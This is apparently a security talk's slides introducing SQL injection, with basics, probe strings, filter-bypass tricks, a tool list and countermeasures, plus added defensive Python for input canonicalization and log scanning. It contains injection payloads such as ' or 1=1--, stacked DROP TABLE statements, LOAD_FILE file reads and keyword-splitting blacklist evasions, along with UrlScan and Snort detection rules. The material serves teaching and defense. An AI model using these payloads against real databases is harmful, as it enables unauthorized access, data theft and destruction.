SQL – Injections Intro.
12/08/21
Greg Bugaj, SCJP
ISSA
DC 405
Agenda
• Disclaimer
• What are SQL Injections
• Intro to SQL
• Attack Vectors
• Bypassing Filters
• Demos
• Countermeasures
• Questions
Disclaimer
• All code shown today is for educational and research purposes only
• In many countries it is illegal to use this type of attack
• Owners of the demonstrated websites have been notified of the problem
SQL Injections
• SQL injection
– A code injection technique that exploits a security vulnerability in an application
– Occurs at the database layer of an application: user input ends up parsed as part of the SQL statement
• SQL - Structured Query Language
– Used to communicate with the database
– ANSI-compliant SQL
SQL Injections
• Authentication Bypass
• Information Disclosure
• Compromised Data Integrity
• Compromised Availability of Data
• Remote Command Execution
Basic SQL
Select
Insert
Update
Delete
Union
• SQL statement breakdown
SQL - Select
1. Select information from a table
SELECT * FROM table WHERE field=1
SQL - Insert
1. Add new records to the database
INSERT INTO tablename (id, name) VALUES (10, 'Greg')
SQL - Update
1. Update existing records
UPDATE table SET fieldA=123 WHERE somefield=2323
UPDATE table SET fieldB='Greg' (no WHERE clause: every row is updated)
SQL - Delete
1. Delete records
DELETE FROM tableA WHERE somefield=1221
DELETE FROM tableA (no WHERE clause: every row is deleted)
SQL - Union
1. Combine two or more SELECT statements.
SELECT column_name(s) FROM table_name1
UNION
SELECT column_name(s) FROM table_name2
Terminators
• ; Semicolon ends the current SQL statement and starts a new one
– SELECT * FROM users ; DROP TABLE users
• Stacked query: two statements sent as one request string
• -- Double dash comments out the rest of the query string
– SELECT * FROM users -- limit 10
• The two can be combined: the injected quote closes the string literal, the semicolon stacks a statement, and the comment discards the rest of the original query
– SELECT * FROM users WHERE id=''; DROP TABLE users; -- ' AND password=''
Where Clause Pruning
• Powerful SQL technique
– SQL trick for allowing a query to return either the full set or a specified subset
– 1=1 == TRUE
• SELECT * FROM users
WHERE (id = :id) OR (-1 = :id)
– With :id bound to -1 every row is returned; with any other id only that row
SQL Injection Cause
• Executed via the front end of the web application
– GET URL parameter
• http://host.com/item.php?cat=1&id=11
– Form POST fields
• <form action="some.php" method="post">
<input name='name'/>
<input type='password' name='passwd'/>
</form>
Techniques
• Normal SQL injections
– Errors & exceptions
– Unexpected output
• O'Reilly != O\'Reilly
• Blind SQL injections
– No errors
– A lot of guesswork
– Introduction of a delay as part of the injected SQL statement (the response time reveals the result)
SQL Injection Types
• Passive
– Exposing database information
• Information retrieval
• Active
– Altering database information
• Insertion
• Deletion
Testing for Vulnerability
• Manual
– Time consuming
• Automated
– SQL injection scanners only scan for known
vulnerabilities
• Google
– Search for leaked database error strings such as "Incorrect syntax near"
Toolbox
• SQLIer
• SQLbftools
• SQLibf
• SQLBrute
• BobCat
• SQLMap
• Absinthe
• SQL Injection Pen-testing Tool
• SQID
• SQLNinja
• FJ-Injector Framework
• Automagic SQL Injector
• NGSS SQL Injector
Identifying Vulnerable Site
Given unexpected input, the site behaves oddly
– ' Single quote
– " Double quote
– '1 Single quote, one
– 'a Single quote, a
– '; Single quote, semicolon
• Input > Satan's little minion
– Nothing found for Satan\'s little minion (the quote was escaped before use: input is filtered)
– You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' (the quote reached the SQL parser: input is not filtered)
Identifying Vulnerable Site
• ' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Bypassing Filters
• Escaping entities
– %26%23039 == &#039; == ' (single quote)
• %26 == &
• %23 == #
• 039 Entity number
– Select * FROM users WHERE username='secret%26%23039 OR %26%23039X%26%23039=%26%23039X
– After URL decoding and HTML entity decoding this is evaluated as: Select * FROM users WHERE username='secret' OR 'X'='X'
• This evaluates to always true
• Char function
– Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115)
– Select * from users
• Concat & Hex functions
– CONCAT('0x', HEX('/var/log/messages'))
– 0x2F7661722F6C6F672F6D65737361676573
Bypassing Filters
• Injecting AND 1=(SELECT LOAD_FILE('var/log/messages') )
– MySQL Error '\'var/log/messages\') ) limit 5 = 1 order by average desc limit 10' at line 1)
– The quotes were escaped before reaching MySQL (note the \' in the error), so the string literal breaks the query instead of being read
Bypassing Filters
• 1=(SELECT LOAD_FILE('var/log/messages') )
– MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average desc limit 10' at line 1)
• Char and Hex encodings carry the same string without any quote character, so quote escaping does not affect them
• Char
• Hex
– 1=(SELECT LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573))
Bypassing Blacklists
• What blacklists are: a list of forbidden keywords matched literally against the input
• Blacklist (DELETE, EXEC)
– DEL/**/ETE
– /**/ D/**EVIL**/ELE/**/TE
– Inline comments split the keyword so the literal match fails, while MySQL strips the comments and still sees DELETE
Escape Characters
• %26%23039 OR %26%23039X%26%23039=%26%23039X
– ' OR 'X' = 'X'
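Added example (not code from the slides) covering the entity, Char/Hex and comment-splitting bypasses above from the defender's side: a canonicalize step that decodes the input the way the server and database will, so a quote or keyword check runs on what the database sees rather than on the raw bytes, plus two helpers that turn CHAR() argument lists and 0x literals seen in logs back into text. The keyword list and the inputs are constructed for the demo.

```python
import html
import re
from urllib.parse import unquote

KEYWORDS = ("delete", "exec", "drop")          # constructed blacklist for the demo
COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)     # inline /* ... */ comments


def canonicalize(value: str) -> str:
    """Reduce input to the form the database will actually see: URL decoding,
    then HTML entity decoding (%26%23039 -> &#039; -> '), repeated until stable,
    then removal of the inline comments used to split keywords (DEL/**/ETE)."""
    for _ in range(5):                           # bounded: stop on decode loops
        step = html.unescape(unquote(value))
        if step == value:
            break
        value = step
    return COMMENT_RE.sub("", value)


def naive_quote_check(value: str) -> bool:
    """Filter applied to the raw request: passes if no literal quote is present."""
    return "'" not in value


def canonical_quote_check(value: str) -> bool:
    """The same rule applied after canonicalization."""
    return "'" not in canonicalize(value)


def naive_blacklist(value: str) -> bool:
    """Keyword blacklist on the raw request; DEL/**/ETE slips through."""
    return not any(k in value.lower() for k in KEYWORDS)


def canonical_blacklist(value: str) -> bool:
    """Keyword blacklist after comment removal; DEL/**/ETE is seen as DELETE."""
    return not any(k in canonicalize(value).lower() for k in KEYWORDS)


def decode_char_call(codes) -> str:
    """Turn the argument list of a CHAR(...) call found in a log back into text."""
    return "".join(chr(c) for c in codes)


def decode_hex_literal(literal: str) -> str:
    """Turn a 0x... literal found in a log back into the string it carries."""
    return bytes.fromhex(literal[2:]).decode("utf-8", errors="replace")
```

Even after canonicalization a blacklist stays a weak control; the check is shown to make the point that validation must run on decoded input, not as a substitute for parameterized queries.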
Demos
• Prerecorded demos
Countermeasures
• System Administrators
– Whitelist / blacklist input validation
– Least privileges
– Application firewalls
• Developers
– Stored procedures
– Parameterized queries
– Exception handling (database errors are logged, not returned to the client)
Whitelist Input validation
• UrlScan v3.0
– Restricts the types of HTTP requests that IIS will process; a custom rule is listed in [RuleList] and its DenyDataSection names the string list it denies:
[RuleList]
SQL Injection Headers
[SQL Injection Headers]
AppliesTo=.asp,.aspx
DenyDataSection=SQL Injection Headers Strings
[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
delete
drop
exec
insert
• SNORT
– Create a rule to check for SQL attack strings (uricontent matches a single string, so repeat the rule for .aspx and .asp; classtype names are lowercase):
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"SQL Injection"; flow:to_server,established; \
uricontent:".php"; nocase; \
pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; \
classtype:web-application-attack; sid:9099; rev:5;)
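Added example (not code from the slides or from Snort) that runs the pcre from the rule above over constructed web-server access log lines, restricted to the script extensions the rule targets, so the hit and false-positive behaviour of that signature can be seen offline. The log lines, addresses and paths are constructed.

```python
import re

# The pcre from the Snort rule on the slide, as a Python regex.
SQLI_RE = re.compile(r"(\%27)|(\')|(\-\-)|(%23)|(#)", re.I)
# Only script extensions, matching the rule's intent (.php / .aspx / .asp).
SCANNED_EXT = (".php", ".aspx", ".asp")
# Common Log Format line: ip ident user [time] "method uri proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})')

# Constructed access log (not real traffic): one tautology probe, one legitimate
# apostrophe, one legitimate "C#" search, one quote in a path the rule ignores.
SAMPLE_LOG = """\
203.0.113.10 - - [08/Dec/2021:10:01:02 -0500] "GET /item.php?cat=1&id=11 HTTP/1.1" 200 512
203.0.113.11 - - [08/Dec/2021:10:01:05 -0500] "GET /item.php?cat=1&id=11%27%20or%201=1-- HTTP/1.1" 500 211
203.0.113.12 - - [08/Dec/2021:10:01:09 -0500] "GET /search.asp?q=Satan's%20little%20minion HTTP/1.1" 200 98
203.0.113.13 - - [08/Dec/2021:10:01:12 -0500] "GET /search.asp?q=C%23%20tutorial HTTP/1.1" 200 2048
203.0.113.14 - - [08/Dec/2021:10:01:15 -0500] "GET /static/notes.html?ref=it's HTTP/1.1" 200 77
"""


def scan_log(text: str):
    """Return (ip, uri, matched_token, status) for every scanned request that
    trips the pattern. The legitimate apostrophe and C# lines also match, which
    is the false-positive cost of a signature this broad."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = m.group("uri")
        path = uri.split("?", 1)[0].lower()
        if not path.endswith(SCANNED_EXT):
            continue
        found = SQLI_RE.search(uri)
        if found:
            hits.append((m.group("ip"), uri, found.group(0), int(m.group("status"))))
    return hits
```

The pattern inspects the raw URI bytes only, so decoding the request before matching (as the Bypassing Filters slides show is needed for entity-encoded quotes) and correlating with the 500 status help separate probes from ordinary apostrophes.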
Least Privileges
• Enforce least privileges
– The application's database account should not hold rights it never needs, such as CREATE / DELETE
– Does not guarantee security
• Access to a portion of the data
– Create views
Application Firewalls
• Software
– Easy to install and maintain
• Hardware
– Expensive
– Plug and Play
• Examples:
– dotDefender
– webApp.SECURE
– SonicWALL
– WatchGuard